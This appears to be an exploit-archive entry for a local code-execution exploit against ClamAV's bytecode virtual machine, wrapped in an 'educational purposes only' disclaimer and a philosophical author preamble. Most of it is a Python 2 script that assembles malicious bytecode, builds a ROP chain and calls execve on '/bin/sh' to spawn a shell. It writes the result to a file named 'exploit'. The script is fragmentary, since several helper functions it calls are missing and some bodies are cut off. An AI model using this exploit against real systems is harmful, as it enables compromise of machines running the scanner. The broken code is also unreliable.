Exploits / Vulnerability Discovered : 2019-11-02 |
Type : local |
Platform : linux
This exploit / vulnerability Clamav < 0.102.0 bytecode_vm code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
Finished : 22/07/2019
Pu8lished : 31/10/2019
Versi0n : Current (<= 0.102.0)
Result : Just for fun.
"Because of my inability to change the world."
In 2002, ClamAV got introducted as a solution for malwares on UNIX-based systems, built on
a signature-based detection approach, and still undergoes active-development. by that time,
LibClamAV only held 2 binaries, and expanded to 5 at present.
ClamBC were exceptionally more complex and served as a testing tool for bytecodes, majorly
validating and interpreting the code therein, and the information provided didn't indicate
nor explain the presence of its internal mechanisms.
The availability of the source-code and the lack of documentation led to the establishment
of this paper, it was certainly not an attempt to escalate privileges, but rather a sought
-after experience, and source of entertainment that grants the thrill of a challenge.
Due to the considerable amount of time spent in the analysis, the dissection of the engine
was imminent, whilst significantly broadening our perception on its internal structures.
The trial and error process produced valuable information, crashes illuminated latent bugs,
effectively increasing the attack surface, and magnifying the possibility for exploitation.
c = 0
for name in names:
names[c] = name.encode('hex')
c += 1
def cc(n):
v = chr(n + 0x60)
return v
def cs(s):
t = ''
for i in xrange(0, len(s), 2):
u = int(s[i], 16)
l = int(s[i + 1], 16)
for i in [u, l]:
if((i >= 0 and i <= 0xf)):
print 'Invalid string.'
t += cc(l) + cc(u)
return t
def wn(n, fixed=0, size=0):
if n is 0:
return cc(0)
t = ''
c = hex(n)[2:]
l = len(c)
if (l % 2) is 1:
c = "0" + c
r = c[::-1]
if(l <= 0x10):
if not fixed:
t = cc(l)
i = 0
while i < l:
t += cc(int(r[i], 16))
i += 1
print 'Invalid number.'
if size != 0:
t = t.ljust(size, '`')
return t
def ws(s):
t = '|'
e = s[-2:]
if(e != '00'):
print '[+] Adding null-byte at the end of the string..'
s += '00'
l = (len(s) / 2)
if (len(s) % 2) is 1:
print 'Invalid string length.'
t += wn(l)
t += cs(s)
return t
def wt(t):
if t < (num_types + 0x45):
v = wn(t)
return v
print 'Invalid type.'
def initialize_header(minfunc=0, maxfunc=0, num_func=0, linelength=4096):
global flimit, num_types
for i in range(0, numglobals):
globals += wt(type[i]) # type
for j in gval[i]: # subcomponents
n = wn(j)
globals += chr(ord(n[0]) - 0x20)
globals += n[1:]
# Header parsing
w = initialize_header(num_func=0x1)
# Types parsing
cont = [[0x8], [0x45], [0x20, 0x20], [0x41, 0x20, 0x20], [0x20, 0x41, 0x20], [0x41, 0x20]]
type = [0x4, 0x5, 0x1, 0x1, 0x1, 0x1]
num = [0x8, 0x1, 0x2, 0x3, 0x3, 0x2]
w += prepare_types(cont, type, num)
# API parsing
ids = [o, k, l, m]
tids = [71, 72, 73, 74]
w += prepare_apis(0x4)
# crash @ id=0
# Globals parsing
type = [0x45]
gval = [[0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41]]
w += prepare_globals(0x1)
# Function header parsing
type = [0x45, 0x41, 0x40, 0x40, 0x40, 0x40, 0x20]
allo = [ 1, 0, 0, 0, 0, 0, 0]
w += prepare_function_header(35, 0x1, 0x0, 0x7)
# BB parsing
p = 'B'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x0)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += '@d'
# STORE (0x0068732f6e69622f(L=8) -> ([Var #1]))
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += 'Nobbfifnfobcghfh'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x360)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'C`fcd'
# LOAD Var #2 = ([Var #1])
p += wn(0x40)
p += wn(0x2)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #2 -= 0xd260
p += wn(0x40)
p += wn(0x2)
p += wn(0x2, 1, 2)
p += wn(0x2)
p += 'D`fbmd'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`ad'
# LOAD Var #3 = ([Var #1])
p += wn(0x40)
p += wn(0x3)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #3 -= 0x10
p += wn(0x40)
p += wn(0x3)
p += wn(0x2, 1, 2)
p += wn(0x3)
p += 'B`ad'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`cd'
# LOAD Var #4 = ([Var #1])
p += wn(0x40)
p += wn(0x4)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #4 -= 0x190
p += wn(0x40)
p += wn(0x4)
p += wn(0x2, 1, 2)
p += wn(0x4)
p += 'C`iad'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x38)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhcd'
# STORE (Var #3 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x3)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x48)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhdd'
# ADD Var #3 += 0x3
p += wn(0x40)
p += wn(0x3)
p += wn(0x2, 1, 2)
p += wn(0x3)
p += 'Acd'
# STORE (Var #3 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x3)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x28)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhbd'
# ADD Var #5 += Var #2 + 0xcbda
p += wn(0x40)
p += wn(0x5)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Djmkld'
# STORE (Var #5 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x5)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x20)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`bd'
# STORE (Var #4 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x4)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x18)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhad'
# ADD Var #5 += Var #2 + 0x99dc
p += wn(0x40)
p += wn(0x5)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Dlmiid'
# STORE (Var #5 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x5)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`ad'
# STORE (0x3b -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += 'Bkcd'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`cd'
# STORE (0x0 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += '@d'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x40)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`dd'
# STORE (0x0 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += '@d'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x8)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Ahd'
# ADD Var #2 += 0x6d68
p += wn(0x40)
p += wn(0x2)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Dhfmfd'
# STORE (Var #2 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x2)
p += wn(0x1)
0x99dc : pop rdi ; ret
0xcbda : pop rsi ; ret
0x6d68 : pop rax ; ret
Var #2 = text_base
Var #3 = syscall (+3: pop rdx; ret)
Var #4 = "/bin/sh\x00"
pop rax; ret; o 0x8
59 o 0x10
pop rdi; ret; o 0x18
sh; address o 0x20
pop rsi; ret; o 0x28
0x0 o 0x30
pop rdx; ret; o 0x38
0x0 o 0x40
syscall o 0x48
# COPY Var #6 = (0x5a90050f(o`e``ije))
p += wn(0x20)
p += wn(0x0)
p += wn(0x22, 1)
p += 'Ho`e``ijeh'
p += wn(0x6)
p += 'T'
p += wn(0x13, 1)
p += wn(0x20)
p += wn(0x6)
p += 'E'
w += p
f = open("exploit", "w")
print '[+] Generated payload'
Mortals represent immorality, clueless, they crush each other in an everlasting
pursuit to climb the ladder of social-status, greed is engraved in their nature,
they're materialistic, and the essence of their lives is money and wealth.
However, such definition is inaccurate as it doesn't apply to the minority.
I have discovered a truly marvelous proof of their existence, which this margin
is too narrow to contain.
- Alien599, not Fermat.
Greetings to Alien133, Alien610, Alien6068, Alien814, Alien641.